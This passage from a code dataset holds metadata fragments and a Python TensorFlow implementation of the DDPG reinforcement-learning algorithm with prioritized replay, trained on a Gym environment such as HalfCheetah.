"logic_normal.LogicNormal.abort", "line_number": 257, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 257, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 259, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 259, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 261, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 261, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_default_filename", "line_number": 263, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 263, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.download", "line_number": 264, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 264, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 267, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 267, "usage_type": "name"}, 
{"api_name": "model.ModelSetting.get", "line_number": 276, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 276, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 277, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 277, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 281, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 281, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 286, "usage_type": "call"}, {"api_name": "flask.request.values.get", "line_number": 290, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 290, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 290, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 291, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 291, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 291, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 292, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 292, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 292, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 292, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 292, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 293, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 293, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 293, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 293, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 293, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 294, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 294, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 294, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 295, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 295, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 295, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 296, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 296, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 296, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 297, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 297, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 297, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 298, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 298, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 298, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 299, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 299, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 299, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 305, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 305, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 307, 
"usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 307, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_default_filename", "line_number": 309, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 309, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.thumbnail", "line_number": 310, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 310, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 313, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 313, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 319, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 319, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 320, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 320, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 324, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 324, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 329, "usage_type": "call"}, {"api_name": "flask.request.values.get", "line_number": 333, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 333, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 333, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 334, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 334, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 334, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 335, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 335, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 335, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 335, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 335, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 336, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 336, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 336, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 336, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 336, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 337, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 337, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 337, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 338, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 338, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 338, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 339, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 339, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 339, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 340, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 340, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 340, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 341, "usage_type": "call"}, {"api_name": 
"flask.request.values", "line_number": 341, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 341, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 342, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 342, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 342, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 343, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 343, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 343, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 344, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 344, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 344, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 350, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 350, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 352, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 352, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_default_filename", "line_number": 354, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 354, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.sub", "line_number": 355, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 355, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 358, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 358, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 366, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 366, "usage_type": "name"}, {"api_name": "model.ModelSetting.get", "line_number": 367, "usage_type": "call"}, {"api_name": "model.ModelSetting", "line_number": 367, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 371, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 371, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 376, "usage_type": "call"}, {"api_name": "flask.request.values.get", "line_number": 380, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 380, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 380, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 381, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 381, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 381, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 387, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 387, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 389, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 389, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 390, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 390, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 391, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 391, "usage_type": "name"}, {"api_name": 
"logic_normal.LogicNormal.abort", "line_number": 393, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 393, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 396, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 396, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 397, "usage_type": "call"}, {"api_name": "flask.request.values.get", "line_number": 401, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 401, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 401, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 402, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 402, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 402, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 408, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 408, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 410, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 410, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 411, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 411, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 412, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 412, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 414, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 414, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 417, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 417, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 418, "usage_type": "call"}, {"api_name": "flask.request.values.get", "line_number": 422, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 422, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 422, "usage_type": "name"}, {"api_name": "flask.request.values.get", "line_number": 423, "usage_type": "call"}, {"api_name": "flask.request.values", "line_number": 423, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 423, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 434, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 434, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 436, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 436, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 437, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 437, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.youtube_dl_list", "line_number": 438, "usage_type": "attribute"}, {"api_name": "logic_normal.LogicNormal", "line_number": 438, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.abort", "line_number": 440, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 440, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 449, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 452, 
"usage_type": "call"}, {"api_name": "flask.abort", "line_number": 453, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 454, "usage_type": "call"}, {"api_name": "flask_cors.cross_origin", "line_number": 212, "usage_type": "call"}, {"api_name": "framework.check_api", "line_number": 213, "usage_type": "name"}, {"api_name": "framework.socketio.emit", "line_number": 461, "usage_type": "call"}, {"api_name": "framework.socketio", "line_number": 461, "usage_type": "name"}, {"api_name": "logic_normal.LogicNormal.get_data", "line_number": 461, "usage_type": "call"}, {"api_name": "logic_normal.LogicNormal", "line_number": 461, "usage_type": "name"}]} +{"seq_id": "219639859", "text": "import numpy as np\nimport tensorflow as tf\nimport gym\nimport time\nimport sys\nsys.path.append(\"../\")\ntry:\n from rl_algorithms.ddpg_sp import core\n from rl_algorithms.ddpg_sp.core import get_vars\nexcept Exception as e:\n print(\"ddpg_error:\", e)\n from ddpg_sp import core\n from ddpg_sp.core import get_vars\n\n\nclass ReplayBuffer:\n \"\"\"\n A simple FIFO experience replay buffer for TD3 agents.\n \"\"\"\n\n def __init__(self, obs_dim, act_dim, size):\n self.obs1_buf = np.zeros([size, obs_dim], dtype=np.float32)\n self.obs2_buf = np.zeros([size, obs_dim], dtype=np.float32)\n self.acts_buf = np.zeros([size, act_dim], dtype=np.float32)\n self.rews_buf = np.zeros(size, dtype=np.float32)\n self.done_buf = np.zeros(size, dtype=np.float32)\n self.ptr, self.size, self.max_size = 0, 0, size\n\n def store(self, obs, act, rew, next_obs, done):\n self.obs1_buf[self.ptr] = obs\n self.obs2_buf[self.ptr] = next_obs\n self.acts_buf[self.ptr] = act\n self.rews_buf[self.ptr] = rew\n self.done_buf[self.ptr] = done\n self.ptr = (self.ptr + 1) % self.max_size\n self.size = min(self.size + 1, self.max_size)\n\n def sample_batch(self, batch_size=32):\n idxs = np.random.randint(0, self.size, size=batch_size)\n return dict(obs1=self.obs1_buf[idxs],\n obs2=self.obs2_buf[idxs],\n acts=self.acts_buf[idxs],\n rews=self.rews_buf[idxs],\n done=self.done_buf[idxs])\n\n\nclass DDPG:\n def __init__(self,\n a_dim, obs_dim, a_bound,\n mlp_actor_critic=core.mlp_actor_critic,\n ac_kwargs=dict(), seed=0,\n\n replay_size=int(1e6), gamma=0.99,\n polyak=0.995, pi_lr=1e-3, q_lr=1e-3,\n batch_size=100, \n act_noise=0.1, target_noise=0.2,\n noise_clip=0.5, policy_delay=2, \n sess_opt=None,\n per_flag=True,\n ):\n self.per_flag = per_flag\n self.learn_step = 0\n\n self.obs_dim = obs_dim\n self.act_dim = a_dim\n self.act_limit = a_bound\n self.policy_delay = policy_delay\n self.action_noise = act_noise\n\n # Share information about action space with policy architecture\n ac_kwargs['action_space'] = a_bound\n\n # Inputs to computation graph\n self.ISWeights = tf.placeholder(tf.float32, [None, 1], name='IS_weights')\n self.actor_lr = tf.placeholder(tf.float32, shape=[], name='actor_lr')\n self.critic_lr = tf.placeholder(tf.float32, shape=[], name='critic_lr')\n self.x_ph, self.a_ph, self.x2_ph, self.r_ph, self.d_ph = core.placeholders(obs_dim, a_dim, obs_dim, None, None)\n\n # Main outputs from computation graph\n with tf.variable_scope('main'):\n self.pi, self.q, q_pi = mlp_actor_critic(self.x_ph, self.a_ph, **ac_kwargs)\n\n # Target networks\n with tf.variable_scope('target'):\n # Note that the action placeholder going to actor_critic here is\n # irrelevant, because we only need q_targ(s, pi_targ(s)).\n pi_targ, _, q_pi_targ = mlp_actor_critic(self.x2_ph, self.a_ph, **ac_kwargs)\n\n # Experience buffer\n if self.per_flag:\n try:\n from 
rl_algorithms.memory.sp_per_memory import ReplayBuffer\n            except:\n                from memory.sp_per_memory import ReplayBuffer\n        else:\n            try:\n                from rl_algorithms.memory.sp_memory import ReplayBuffer\n            except:\n                from memory.sp_memory import ReplayBuffer\n        self.replay_buffer = ReplayBuffer(obs_dim=obs_dim,\n                                          act_dim=self.act_dim,\n                                          size=replay_size)\n\n        # Count variables\n        var_counts = tuple(core.count_vars(scope) for scope in ['main/pi', 'main/q', 'main'])\n        print('\\nNumber of parameters: \\t pi: %d, \\t q: %d, \\t total: %d\\n' % var_counts)\n\n        # Bellman backup for Q function\n        backup = tf.stop_gradient(self.r_ph + gamma * (1 - self.d_ph) * q_pi_targ)\n\n        # DDPG losses\n        self.pi_loss = -tf.reduce_mean(q_pi)\n\n        if self.per_flag:\n            # q_target - q\n            self.abs_errors = tf.abs(backup - self.q)\n            self.q_loss = tf.reduce_mean(self.ISWeights * (self.q - backup) ** 2)  # importance-sampling-weighted MSE\n        else:\n            # The normal (non-PER) one!\n            self.q_loss = tf.reduce_mean((self.q - backup) ** 2)\n\n        # Separate train ops for pi, q\n        pi_optimizer = tf.train.AdamOptimizer(learning_rate=self.actor_lr)\n        q_optimizer = tf.train.AdamOptimizer(learning_rate=self.critic_lr)\n        self.train_pi_op = pi_optimizer.minimize(self.pi_loss, var_list=get_vars('main/pi'))\n        self.train_q_op = q_optimizer.minimize(self.q_loss, var_list=get_vars('main/q'))\n\n        # Polyak averaging for target variables\n        self.target_update = tf.group([tf.assign(v_targ, polyak * v_targ + (1 - polyak) * v_main)\n                                       for v_main, v_targ in zip(get_vars('main'), get_vars('target'))])\n\n        # Initializing targets to match main variables\n        target_init = tf.group([tf.assign(v_targ, v_main)\n                                for v_main, v_targ in zip(get_vars('main'), get_vars('target'))])\n\n        if sess_opt:\n            gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=sess_opt)\n            self.sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))\n        else:\n            self.sess = tf.Session()\n        self.sess.run(tf.global_variables_initializer())\n        self.sess.run(target_init)\n\n    def get_action(self, s, noise_scale=None):  # pass 0 explicitly for a deterministic action\n        if noise_scale is None:\n            noise_scale = self.action_noise\n        a = self.sess.run(self.pi, feed_dict={self.x_ph: s.reshape(1, -1)})[0]\n        a += noise_scale * np.random.randn(self.act_dim)\n        return np.clip(a, -self.act_limit, self.act_limit)\n\n    def store_transition(self, transition):\n        if self.per_flag:\n            self.replay_buffer.store(transition)\n        else:\n            (s, a, r, s_, done) = transition\n            self.replay_buffer.store(s, a, r, s_, done) \n\n    def test_agent(self, env, max_ep_len=1000, n=5):\n        ep_reward_list = []\n        for j in range(n):\n            s = env.reset()\n            ep_reward = 0\n            for i in range(max_ep_len):\n                # Take deterministic actions at test time (noise_scale=0)\n                s, r, d, _ = env.step(self.get_action(s, 0))\n                ep_reward += r\n            ep_reward_list.append(ep_reward)\n        mean_ep_reward = np.mean(np.array(ep_reward_list))\n        return mean_ep_reward\n\n    def learn(self, batch_size=100, actor_lr_input=0.001,\n              critic_lr_input=0.001,):\n        if self.per_flag:\n            tree_idx, batch_memory, ISWeights = self.replay_buffer.sample(batch_size=batch_size)\n            batch_states, batch_actions, batch_rewards, batch_states_, batch_dones = [], [], [], [], []\n            for i in range(batch_size):\n                batch_states.append(batch_memory[i][0])\n                batch_actions.append(batch_memory[i][1])\n                batch_rewards.append(batch_memory[i][2])\n                batch_states_.append(batch_memory[i][3])\n                batch_dones.append(batch_memory[i][4])\n\n            feed_dict = {self.x_ph: np.array(batch_states),\n                         self.x2_ph: np.array(batch_states_),\n                         self.a_ph: np.array(batch_actions),\n                         self.r_ph: np.array(batch_rewards),\n                         self.d_ph: np.array(batch_dones),\n                         self.actor_lr: 
actor_lr_input,\n self.critic_lr: critic_lr_input,\n self.ISWeights: ISWeights\n }\n q_step_ops = [self.q_loss, self.q,\n self.train_q_op,\n self.abs_errors,\n ]\n outs = self.sess.run(q_step_ops, feed_dict)\n q_loss, q, train_q_op, abs_errors = outs\n if self.learn_step % self.policy_delay == 0:\n # Delayed policy update\n outs = self.sess.run([self.pi_loss,\n self.train_pi_op,\n self.target_update],\n feed_dict)\n\n self.replay_buffer.batch_update(tree_idx,\n abs_errors) # update priority\n self.learn_step += 1\n return outs\n else:\n batch = self.replay_buffer.sample_batch(batch_size)\n feed_dict = {self.x_ph: batch['obs1'],\n self.x2_ph: batch['obs2'],\n self.a_ph: batch['acts'],\n self.r_ph: batch['rews'],\n self.d_ph: batch['done'],\n self.actor_lr: actor_lr_input,\n self.critic_lr: critic_lr_input,\n }\n q_step_ops = [self.train_q_op]\n\n # Q-learning update\n outs = self.sess.run([self.q_loss, self.q, self.train_q_op], feed_dict)\n # Policy update\n outs = self.sess.run([self.pi_loss, self.train_pi_op, self.target_update],\n feed_dict)\n\n self.learn_step += 1\n\n def load_step_network(self, saver, load_path):\n checkpoint = tf.train.get_checkpoint_state(load_path)\n if checkpoint and checkpoint.model_checkpoint_path:\n saver.restore(self.sess, tf.train.latest_checkpoint(load_path))\n print(\"Successfully loaded:\", checkpoint.model_checkpoint_path)\n self.learn_step = int(checkpoint.model_checkpoint_path.split('-')[-1])\n else:\n print(\"Could not find old network weights\")\n\n def save_step_network(self, time_step, saver, save_path):\n saver.save(self.sess, save_path + 'network', global_step=time_step,\n write_meta_graph=False)\n\n def load_simple_network(self, path):\n saver = tf.train.Saver()\n saver.restore(self.sess, tf.train.latest_checkpoint(path))\n print(\"restore model successful\")\n\n def save_simple_network(self, save_path):\n saver = tf.train.Saver()\n saver.save(self.sess, save_path=save_path + \"/params\", write_meta_graph=False)\n\n\nif __name__ == '__main__':\n import argparse\n\n random_seed = int(time.time() * 1000 % 1000)\n random_seed = 184\n parser = argparse.ArgumentParser()\n parser.add_argument('--env', type=str, default='HalfCheetah-v2')\n parser.add_argument('--hid', type=int, default=300)\n parser.add_argument('--l', type=int, default=1)\n parser.add_argument('--gamma', type=float, default=0.99)\n parser.add_argument('--seed', '-s', type=int, default=random_seed)\n parser.add_argument('--epochs', type=int, default=3000)\n parser.add_argument('--max_steps', type=int, default=1000)\n parser.add_argument('--exp_name', type=str, default='ddpg_per_class')\n args = parser.parse_args()\n\n env = gym.make(args.env)\n env = env.unwrapped\n env.seed(args.seed)\n\n s_dim = env.observation_space.shape[0]\n a_dim = env.action_space.shape[0]\n a_bound = env.action_space.high[0]\n\n net = DDPG(a_dim, s_dim, a_bound,\n batch_size=100,\n sess_opt=0.1\n )\n ep_reward_list = []\n test_ep_reward_list = []\n\n for i in range(args.epochs):\n s = env.reset()\n ep_reward = 0\n st = time.time()\n for j in range(args.max_steps):\n\n # Add exploration noise\n if i < 10:\n a = np.random.rand(a_dim) * a_bound\n else:\n # a = net.choose_action(s)\n a = net.get_action(s, 0.1)\n # a = noise.add_noise(a)\n\n a = np.clip(a, -a_bound, a_bound)\n\n s_, r, done, info = env.step(a)\n done = False if j == args.max_steps - 1 else done\n\n net.store_transition((s, a, r, s_, done))\n\n s = s_\n ep_reward += r\n if j == args.max_steps - 1:\n ep_update_time = time.time()\n for _ in 
range(args.max_steps):\n                    net.learn()\n                ep_update_time = time.time() - ep_update_time\n                ep_reward_list.append(ep_reward)\n                print('Episode:', i, ' Reward: %i' % int(ep_reward),\n                      # 'Explore: %.2f' % var,\n                      \"learn step:\", net.learn_step,\n                      \"ep_time:\", np.round(time.time()-st, 3),\n                      \"up_time:\", np.round(ep_update_time, 3),\n                      )\n                # if ep_reward > -300:RENDER = True\n\n                # Add the evaluation part!\n                if i % 20 == 0:\n                    test_ep_reward = net.test_agent(env=env, n=5)\n                    test_ep_reward_list.append(test_ep_reward)\n                    print(\"-\" * 20)\n                    print('Episode:', i, ' Reward: %i' % int(ep_reward),\n                          'Test Reward: %i' % int(test_ep_reward),\n                          )\n                    print(\"-\" * 20)\n\n                break\n\n    import matplotlib.pyplot as plt\n\n    plt.plot(ep_reward_list)\n    img_name = str(args.exp_name + \"_\" + args.env + \"_epochs\" +\n                   str(args.epochs) +\n                   \"_seed\" + str(args.seed))\n    plt.title(img_name + \"_train\")\n    plt.savefig(img_name + \".png\")\n    plt.show()\n    plt.close()\n\n    plt.plot(test_ep_reward_list)\n    plt.title(img_name + \"_test\")\n    plt.savefig(img_name + \"_test.png\")\n    plt.show()", "sub_path": "algos/tf1/ddpg_sp/DDPG_per_class.py", "file_name": "DDPG_per_class.py", "file_ext": "py", "file_size_in_byte": 13805, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.path.append", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 26, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 39, "usage_type": "attribute"}, {"api_name": "ddpg_sp.core.mlp_actor_critic", "line_number": 50, "usage_type": "attribute"}, {"api_name": "ddpg_sp.core", "line_number": 50, "usage_type": "name"}, {"api_name": "tensorflow.placeholder", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 75, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 76, "usage_type": "attribute"}, {"api_name": "ddpg_sp.core.placeholders", "line_number": 77, "usage_type": "call"}, {"api_name": "ddpg_sp.core", "line_number": 77, "usage_type": "name"}, {"api_name": "tensorflow.variable_scope", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 84, "usage_type": "call"}, {"api_name": "memory.sp_memory.ReplayBuffer", "line_number": 100, "usage_type": "call"}, {"api_name": "ddpg_sp.core.count_vars", "line_number": 105, "usage_type": "call"}, {"api_name": "ddpg_sp.core", "line_number": 105, "usage_type": "name"}, {"api_name": 
"tensorflow.stop_gradient", "line_number": 109, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 112, "usage_type": "call"}, {"api_name": "tensorflow.abs", "line_number": 116, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 123, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 123, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 124, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 124, "usage_type": "attribute"}, {"api_name": "ddpg_sp.core.get_vars", "line_number": 125, "usage_type": "call"}, {"api_name": "ddpg_sp.core.get_vars", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.group", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.assign", "line_number": 129, "usage_type": "call"}, {"api_name": "ddpg_sp.core.get_vars", "line_number": 130, "usage_type": "call"}, {"api_name": "tensorflow.group", "line_number": 133, "usage_type": "call"}, {"api_name": "tensorflow.assign", "line_number": 133, "usage_type": "call"}, {"api_name": "ddpg_sp.core.get_vars", "line_number": 134, "usage_type": "call"}, {"api_name": "tensorflow.GPUOptions", "line_number": 137, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 138, "usage_type": "call"}, {"api_name": "tensorflow.ConfigProto", "line_number": 138, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 140, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 148, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.array", 